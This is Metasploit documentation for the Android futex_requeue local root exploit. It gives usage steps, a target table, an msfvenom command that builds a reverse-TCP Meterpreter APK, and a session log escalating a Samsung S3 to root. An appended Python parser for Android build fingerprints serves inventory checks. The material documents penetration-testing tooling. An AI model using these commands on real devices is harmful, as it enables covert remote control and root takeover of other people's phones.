
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/android/local/futex_requeue.md
Vulnerable Application

This module exploits a Linux kernel vulnerability in the futex system call; the same flaw is present in the Android kernel. It does not trip (set off) Samsung KNOX as of the time of writing.

Failed exploitation attempts may reboot the device.

Verification Steps

  1. Start msfconsole
  2. Get a shell on a vulnerable Android device
  3. Do: `use exploit/android/local/futex_requeue`
  4. Select an appropriate target
  5. Do: `set lhost [IP]`
  6. Do: `run`
  7. You should get a root shell.

Targets

| Id | Name                | Description                                   |
|----|---------------------|-----------------------------------------------|
| 0  | Automatic Targeting | Attempt to automatically determine the target |
| 1  | Default             | Nexus 4, 5, 7, etc.                           |
| 2  | New Samsung         | Samsung S3, S4, S5, etc.                      |
| 3  | Old Samsung         | Samsung Note 2, etc.                          |
| 4  | Samsung Grand       | Samsung Grand, etc.                           |

Scenarios

Samsung Galaxy S3 Verizon (SCH-I535 with Android 4.4.2, kernel 3.4.0)

The following command was used to generate a Meterpreter Android application, which was then installed on the device.

```
msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
```

The handler was started from a resource script, the application was launched on the device, and the resulting session was handed to the module:

```
[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue
msf5 exploit(android/local/futex_requeue) > set session 1
session => 1
msf5 exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf5 exploit(android/local/futex_requeue) > check
[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
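The `check` and `run` output above keys its target selection and vulnerability verdict off the device's Android build fingerprint. The following Python parser is an added example, not code from the Metasploit module or its documentation: it splits a fingerprint into its named fields using Android's documented layout (`BRAND/PRODUCT/DEVICE:VERSION.RELEASE/BUILD_ID/VERSION.INCREMENTAL:BUILD_TYPE/BUILD_TAGS`), pulls fingerprint lines out of a module transcript, and compares the release against a caller-supplied minimum. The `below_release` threshold and the second line of `SAMPLE_LOG` are assumptions for illustration only; nothing here states which releases carry the flaw, so an inventory check must take its threshold from the kernel patch level actually deployed.

```python
import re

# Android build fingerprint layout (the format Android's build system emits):
#   BRAND/PRODUCT/DEVICE:VERSION.RELEASE/BUILD_ID/VERSION.INCREMENTAL:BUILD_TYPE/BUILD_TAGS
_FINGERPRINT_RE = re.compile(
    r"^(?P<brand>[^/]+)/(?P<product>[^/]+)/(?P<device>[^:]+):"
    r"(?P<release>[^/]+)/(?P<build_id>[^/]+)/(?P<incremental>[^:]+):"
    r"(?P<build_type>[^/]+)/(?P<tags>.+)$"
)


def parse_fingerprint(fp: str) -> dict:
    """Split a build fingerprint into its named fields; ValueError on malformed input."""
    m = _FINGERPRINT_RE.match(fp.strip())
    if not m:
        raise ValueError(f"not a build fingerprint: {fp!r}")
    return m.groupdict()


def release_tuple(release: str) -> tuple:
    """'4.4.2' -> (4, 4, 2). Non-numeric parts become 0 so comparisons never raise."""
    return tuple(int(p) if p.isdigit() else 0 for p in release.split("."))


def extract_fingerprints(log: str) -> list:
    """Return the value of every 'Fingerprint:' line in a module transcript."""
    return re.findall(r"Fingerprint:\s*(\S+)", log)


def below_release(fp: str, minimum: str) -> bool:
    """True when the fingerprint's Android release is older than `minimum`.

    `minimum` is a hypothetical threshold chosen by the caller (assumption);
    this function does not encode which releases are affected.
    """
    return release_tuple(parse_fingerprint(fp)["release"]) < release_tuple(minimum)


# Constructed sample: the real transcript line from the scenario above, plus a
# second, obviously placeholder fingerprint to show the comparison going the other way.
SAMPLE_LOG = """\
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Fingerprint: example/placeholder/placeholder:6.0.1/EXAMPLE/0:user/test-keys
"""


def summarize(log: str, minimum: str) -> list:
    """(device, release, older_than_minimum) for each fingerprint found in `log`."""
    out = []
    for fp in extract_fingerprints(log):
        fields = parse_fingerprint(fp)
        out.append((fields["device"], fields["release"], below_release(fp, minimum)))
    return out


if __name__ == "__main__":
    for device, release, old in summarize(SAMPLE_LOG, "5.0"):
        print(f"{device:12s} release={release:8s} below 5.0: {old}")
```

Build tags (`release-keys` vs `test-keys`) and build type (`user`, `userdebug`, `eng`) come out of the same parse, which is useful when deciding whether a device in inventory is a production build or an engineering one.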